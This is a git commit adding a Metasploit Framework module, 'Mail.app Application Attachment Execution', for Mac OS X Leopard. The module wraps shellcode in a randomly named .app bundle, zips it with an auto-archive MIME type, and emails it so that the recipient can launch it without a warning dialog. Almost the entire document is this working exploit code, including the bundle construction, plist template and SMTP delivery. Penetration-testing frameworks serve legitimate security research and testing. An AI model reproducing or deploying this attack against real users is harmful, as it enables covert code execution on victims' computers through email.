New mail.app exploit for leopard

git-svn-id: file:///home/svn/framework3/trunk@5209 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-11-28 22:23:31 +00:00
parent 907282b061
commit 9b343c7149
2 changed files with 231 additions and 0 deletions

Binary file not shown.

View File

@ -0,0 +1,231 @@
##
# $Id: mailapp_image_exec.rb 5206 2007-11-26 22:29:07Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'rex'
require 'msf/core'
require 'zip/zipfilesystem'
require 'ftools'
module Msf
class Exploits::Osx::Email::MailAppAttachment < Msf::Exploit::Remote
#
# This module sends email messages via smtp
#
include Exploit::Remote::SMTPDeliver
def initialize(info = {})
super(update_info(info,
'Name' => 'Mail.app Application Attachment Execution',
'Description' => %q{
This module exploits sends an email message to a user containing
shellcode encoded into an executable attachment. The user does not receive
any warning dialog when opening this attachment with Mail.app. Tested on 10.5.
},
'License' => MSF_LICENSE,
'Author' => ['hdm', 'Kevin Finisterre <kf[at]digitalmunition.com>'],
'Version' => '$Revision: 5206 $',
'References' =>
[
# ?
],
'Stance' => Msf::Exploit::Stance::Passive,
'Payload' =>
{
'Space' => 8192,
'DisableNops' => true,
'BadChars' => "",
'Compat' =>
{
'ConnectionType' => '-bind -find',
},
},
'Targets' =>
[
[ 'Mail.app - Binary Payloads (x86)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Mail.app - Binary Payloads (ppc)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
],
'DisclosureDate' => 'Nov 28 2007'
))
register_options(
[
OptString.new('MAILSUBJECT', [false, "The subject of the sent email"]),
OptString.new('MAILMESSAGE', [false, "This text contents of the email message"])
], self.class)
end
def autofilter
false
end
def exploit
data = rand_text_alpha(rand(32)+1)
msg = Rex::MIME::Message.new
msg.mime_defaults
msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
msg.to = datastore['MAILTO']
msg.from = datastore['MAILFROM']
txt = datastore['MAILMESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1)
bin = ''
if(target.arch.index(ARCH_PPC))
bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '')
end
if(target.arch.index(ARCH_X86))
bin = Rex::Text.to_osx_x86_macho(payload.encoded, '')
end
zfd = Tempfile.new('mailappzip')
# XXX: Race condition, fix the Zip API
File.unlink(zfd.path)
name = rand_text_alpha(rand(4)+4).downcase.capitalize
Zip::ZipFile.open(zfd.path, Zip::ZipFile::CREATE) do |zf|
zf.dir.mkdir("#{name}.app")
zf.dir.chdir("#{name}.app")
zf.dir.mkdir("Contents")
zf.dir.chdir("Contents")
zf.file.open("Info.plist", "w") do |fd|
fd.write(get_info_plist(name))
end
zf.file.open("PkgInfo", "w") do |fd|
fd.write("APPL????")
end
zf.dir.mkdir("MacOS")
zf.dir.chdir("MacOS")
zf.file.open(name, "w") do |fd|
fd.write(bin)
end
zf.dir.chdir("..")
zf.dir.mkdir("Resources")
zf.dir.chdir("Resources")
zf.file.open("#{name}.icns", "w") do |fd|
fd.write(get_app_icns())
end
end
cmd = Rex::Text.encode_base64(File.read(zfd.path), "\r\n")
zfd.close
msg.add_part(Rex::Text.encode_base64(txt, "\r\n"), "text/plain", "base64", "inline")
msg.add_part(cmd , "application/zip; x-mac-auto-archive=yes; name=\"#{name}.app.zip\"", "base64", "attachment; filename=#{name}.app.zip" )
send_message(msg.to_s)
print_status("Waiting for a payload session (backgrounding)...")
end
def get_info_plist(name)
%Q|
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>#{name}</string>
<key>CFBundleGetInfoString</key>
<string>2.1.1</string>
<key>CFBundleIconFile</key>
<string>#{name}.icns</string>
<key>CFBundleIdentifier</key>
<string>com.#{name.downcase}</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>Busted</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleShortVersionString</key>
<string>2.1.1</string>
<key>CFBundleSignature</key>
<string>????</string>
<key>CFBundleVersion</key>
<string>2.1.1</string>
<key>LSHasLocalizedDisplayName</key>
<false/>
<key>NSHumanReadableCopyright</key>
<string>#{name}</string>
</dict>
</plist>
|
end
def get_app_icns
File.read(File.join(Msf::Config.install_root, "data", "exploits", "iceweasel_macosx.icns"))
end
end
end